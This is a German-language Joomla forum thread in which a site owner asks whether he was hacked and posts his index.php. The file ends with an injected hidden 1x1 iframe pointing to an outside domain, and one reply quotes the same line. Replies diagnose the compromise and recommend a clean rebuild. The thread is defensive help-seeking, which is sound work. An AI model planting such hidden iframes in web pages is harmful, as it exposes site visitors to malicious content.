Wurde ich gehackt?

**Hägar-Helge** · 20.01.2011 14:04

Hallo,
seit kurzem ist komme ich nicht mehr auf meine Seite. Folgender fehler ist zu lesen:

Parse error: syntax error, unexpected '<' in /homepages/2/d159993783/htdocs/html/index.php on line 88

folgender Quellcode kommt:

PHP-Code:


<?php

/**

* @version        $Id: index.php 9764 2007-12-30 07:48:11Z ircmaxell $

* @package        Joomla

* @copyright    Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.

* @license        GNU/GPL, see LICENSE.php

* Joomla! is free software. This version may have been modified pursuant

* to the GNU General Public License, and as distributed it includes or

* is derivative of works licensed under the GNU General Public License or

* other free or open source software licenses.

* See COPYRIGHT.php for copyright notices and details.

*/



// Set flag that this is a parent file

define( '_JEXEC', 1 );



define('JPATH_BASE', dirname(__FILE__) );



define( 'DS', DIRECTORY_SEPARATOR );



require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );

require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );



JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;



/**

 * CREATE THE APPLICATION

 *

 * NOTE :

 */

$mainframe =& JFactory::getApplication('site');



/**

 * INITIALISE THE APPLICATION

 *

 * NOTE :

 */

// set the language

$mainframe->initialise();



JPluginHelper::importPlugin('system');



// trigger the onAfterInitialise events

JDEBUG ? $_PROFILER->mark('afterInitialise') : null;

$mainframe->triggerEvent('onAfterInitialise');



/**

 * ROUTE THE APPLICATION

 *

 * NOTE :

 */

$mainframe->route();



// authorization

$Itemid = JRequest::getInt( 'Itemid');

$mainframe->authorize($Itemid);



// trigger the onAfterDisplay events

JDEBUG ? $_PROFILER->mark('afterRoute') : null;

$mainframe->triggerEvent('onAfterRoute');



/**

 * DISPATCH THE APPLICATION

 *

 * NOTE :

 */

$option = JRequest::getCmd('option');

$mainframe->dispatch($option);



// trigger the onAfterDisplay events

JDEBUG ? $_PROFILER->mark('afterDispatch') : null;

$mainframe->triggerEvent('onAfterDispatch');



/**

 * RENDER  THE APPLICATION

 *

 * NOTE :

 */

$mainframe->render();



// trigger the onAfterDisplay events

JDEBUG ? $_PROFILER->mark('afterRender') : null;

$mainframe->triggerEvent('onAfterRender');



/**

 * RETURN THE RESPONSE

 */

echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe src="http://adsensestat.com/" width="1" height="1" frameborder="0"></iframe></body></html>

Wenn ich über Filezilla mir die Ordner ansehe, ist in jedem Ordner eine index.php vom 19.01.2011 alle so etwa um 11:53 erstellt.

Ich kenne mich mit der ganzen Materie nicht so richtig aus und bin quasi Anfänger. Daher hatte ich bisher auch kein Backup erstellt. Das habe ich heute nachgeholt. Nutzt das eigentlich etwas? Oder ist er auch verseucht?
Wie gehe ich am besten vor, damit meine Seite wieder online gehen kann?

Passwort der Datenbank und vom FTP habe ich bereits geändert.

Die Seite läuft über 1und1.

Hoffentlich könnt ihr mir etwas helfen.
LG
Hägar

**killbill** · 20.01.2011 14:13

hi

ja, ich denke, du wurdest gehackt.

echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe src="http://adsensestat.com/" width="1" height="1" frameborder="0">

hier siehst du zumindest einen frame, der eigentlich nicht sichtbar sein soll (eben 1 pixel breit, 1 pixel hoch). ich nehme nicht an, das das von dir ist. dein backup im nachhinein ist meiner ansicht nach bereits zu spät, du hast ja jetzt alle schwachpunkte und gehackten dateien mit gesichert. daher würde ich einfach mal flottes liste abarbeiten.

hier der link zu den faqs, wo du wichtige einstellungen zum thema sicherheit deiner seite findest: http://www.joomlaportal.de/erste-sch...a-1-5-faq.html

hier flottes liste: https://www.fc-hosting.de/joomla/tip...la-gehackt.php

gruss
killbill

**Marcus77** · 20.01.2011 14:16

JA du wurdest gehackt !

Ersichtlich an dem IFRAME

Wie schon beschrieben die LINKS durchgehen !

Und die Seite updaten, welche Version hast DU ?

Auch die Zusätze beachten, die du verwendest !
welche hast DU da ?

**Arni** · 20.01.2011 14:17

Ja, du bist gehackt worden! Alles was in der letzten Zeile steht, gehört da definitiv nicht rein.

PHP-Code:


<html><body><iframe src="http://xxxxxxxxx/" width="1" height="1" frameborder="0"></iframe></body></html>

Sperre deine Seite mit einer .htaccess und arbeite "Flottes Liste" ab. Hinweise dazu findest du in den FAQs, Kap. 2.6 To do nach einem Hack

**Hägar-Helge** · 20.01.2011 15:16

Danke euch allen schon einmal für die schnelle Hilfe.

Da ich an die ganze Sache doch eher naiv drangeganen bin habe ich nicht wirklich oft ein Update gemacht. Ich nutze noch die Version 1.5.9.1.
Welche Zusätze ich verwende, kann ich leider nicht sagen, aber die sind auch schon älter. Ich habe einfach, weil es funktioniert hat, so gelassen, wie es war und nur noch einzelen Artikel hinzugefügt.
Eigentlich habe ich auch immer vorgehabt, ein Backup zu erstellen, aber es schien mir irgendwie zu schwierig.
Naja, jetzt werde ich dafür bestraft.

zu Punkt eins:

Website deaktivieren
wie?
a) Beste Möglichkeit: Passwortschutz setzen (.htaccess)
b) oder Basisverzeichnis unbenennen
c) Alle Zugriffsmethoden auf Daten deaktivieren oder ändern (FTP, SSH etc.).
d) notfalls alle Daten herunterladen und vom Server löschen

Ich habe jetzt erst einmal eine Umleitung zu einer anderen Seite gemacht. Reicht das für evtl. rechtliche Sachen aus?
Frage zu a: kann ich einfach die Datei .htaccess kopieren und nach meine wünschen anpassen? und die dann via FTP ins joomla verzeichnis schieben? Ebenso die Datei benutzer.txt und gruppen.txt?
Frage zu b: Reicht das, wenn ich einfach den Ausgangsordner umbenenne (via FTP)?
zu c: FTP und Datenbank Passwörter seind geändert,
zu d: ist das dann noch nötig?

Allgemeine Frage:
wenn mein Backup auch verseucht ist (da ja eben erst erstellt), ist es da überhaupt sinnvoll den ganzen Aufwand zu betreiben oder ist es für einen Laien einfacher alles aus dem FTP und der Datenbank zu löschen und die Seite noch einmal von neuem zu erstellen?
Ich hatte ja schon im FTP entdeckt, dass in jedem Ordner eine index.php von gestern drin ist, die nicht von mir ist. Bringt es etwas die zu löschen und alles wäre wieder in Ordnung?

**cylance** · 20.01.2011 15:23

Ich hatte ja schon im FTP entdeckt, dass in jedem Ordner eine index.php von gestern drin ist, die nicht von mir ist. Bringt es etwas die zu löschen und alles wäre wieder in Ordnung?

NEIN

Ich habe jetzt erst einmal eine Umleitung zu einer anderen Seite gemacht. Reicht das für evtl. rechtliche Sachen aus?

Rechtlich können wir Dich hier nicht beraten

d) notfalls alle Daten herunterladen und vom Server löschen

zu d: ist das dann noch nötig?

Kannst Du definitiv ausschliessen, dass da noch was verseucht ist?

Ich nicht!

Hier zum Nachdenken http://www.joomlaportal.de/beta-howt...-anf-nger.html

**Claudia E.** · 20.01.2011 15:25

Zitat von Hägar-Helge

wenn mein Backup auch verseucht ist (da ja eben erst erstellt), ist es da überhaupt sinnvoll den ganzen Aufwand zu betreiben oder ist es für einen Laien einfacher alles aus dem FTP und der Datenbank zu löschen und die Seite noch einmal von neuem zu erstellen?

Ab oder klingt es besser.

Im Ernst: verbuch das Ganze als Lehrgeld und fang mit einem neuen, sauberen System ganz neu an.
Alle Inhalte der jetzigen Seite würde ich löschen.

Zitat von Hägar-Helge

Bringt es etwas die zu löschen und alles wäre wieder in Ordnung?

Kann sein, muss aber nicht.
Der Mistkerl hatte Zugriff auf dein Joomla, nur er weiß, was genau er getan hat.
Geh das Risiko nicht ein.

**cylance** · 20.01.2011 15:36

Wie Claudia sagt verbuche das ganze als Lehrgeld.

Tip:
Da wir nicht wissen auf welchem IT-Level Du bist. Es gibt die Möglichkeit, dass Du die DB auf ein isoliertes Testsystem mit einem sauberen Joomla einspielst. Du hast dann die Möglichkeit die Beiträge in einen Editor zu kopieren und abzuspeichern. Lass Dir ggf. dabei helfen.

Achtung: Ob die DB ebenfalls verseucht ist lässt sich nicht ausschliessen.

**GoldenBoy** · 20.01.2011 17:34

Nabend,

mich hat es gestern um kurz nach 12 erwischt, mein Joomla war aktuell auf der 1.5.22, bei den Komponenten war ich etwas schlusig, die waren allen auf dem Stand Sommer 2010.
Man so ein Sch..., Lehrgeld hin oder her, es sieht ganz so aus, als ob das ein etwas größerer Angriff gewesen sein muss, habe beim stöbern durch diverse Foren, immer wieder die selbe Adresszeile mit der selben Zieladresse entdeckt.

Ok, also alles neu macht der Mai, ähm, Januar.

GB

**Anifrieber** · 23.01.2011 05:34

Hallo Leute,
was ich euch definitiv sagen kann ist: Das hat mit Joomla nix zu tun. Bei mir waren gleich 2 Domains betroffen, mit jeweils ca. 60(!) Subdomains, die völlig unabhängig voneinander auf verschiedenen Servern liegen. Auf einem Server hatte ich auch eine Joomla-Installation (zu Testzwecken) auf dem anderen NICHT. Im übrigen haben auch viele Benutzer von Xt-Commerce-Shops das Problem.
Das es diesen Usern als erstes auffällt liegt daran, daß der Code in .php Dateien falsch eingebaut wird und die Seite nicht mehr angezeigt wird bzw. eine Code-Fehlermeldung. So hatte ich das gleiche auf meinem Blog mit einer Wordpress-Installation und genau deshalb ist mir das überhaupt aufgefallen.

Das kuriose ist:
1. Dieses iframe wurde in sämtliche Index-Seiten eingefügt, egal ob .php oder .html
2. Sämtliche Index-Dateien, auf beiden Servern, wurden am 19.01.2011 um etwa 12:00 Uhr geändert, bei den meisten anderen betroffenen übrigens auch. (Siehe auch GoldenBoy's Beitrag über meinem).

Ich dachte auch erst an ein Script, was zu einer bestimmten Zeit an einem Tag zuschlägt, aber ich habe rausgefunden dass es ein Botnetzwerk sein muss.

Die Änderung erfolgte laut meiner Logdaten über FTP, was mich stutzig machte, da ich glaube daß ein Script auf dem Server dann wohl nicht verantwortlich sein wird.

Folgendes ist nur eine Vermutung aber ich glaube ich liege richtig. Würde mich sehr interessieren ob die betroffenen auch diesen Trojaner drauf haben!

Ich glaube in meinem Fall ist es so, daß ich mir einen Trojaner eingefangen habe, der (FTP-)Passwörter ausspähen kann. Nämlich: portwexexe. Der war bei mir tatsächlich unter "C:/portwexexe" zu finden, allerdings versteckt.

-Beschreibung bei Avira: portwexexe
-Ein Thread bei Trojaner-Board: portwexexe entfernen

Ich habe das Ding mit Malwarebytes-Antispyware entfernt und die Registry-Einträge und den Ordner auf C: nochmal extra manuell
Ob der jetzt weg ist weiß ich nicht, ich werde weiter lesen und scannen.

Einen Rat an etwas unerfahrenere User: Erstmal die FTP-Passwörter ändern und nicht speichern, dann kann man mit dem Clean-Up beginnen.
Am Rande möchte ich noch bemerken:
Ich bin schon recht lange im Internet-Business unterwegs und muß immer wieder feststellen, wie gerade jungen Menschen und Anfängern echt Angst gemacht wird.
Klar, immer schön vorsichtig und gesetzeskonform, aber man muß sich auch nicht irre machen lassen.

Viele Grüße und Erfolg,
Anifrieber, der wo doriert

Thema: Wurde ich gehackt?

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Wurde ich gehackt?

Erhielt Danksagungen von:

Lesezeichen

Lesezeichen

Berechtigungen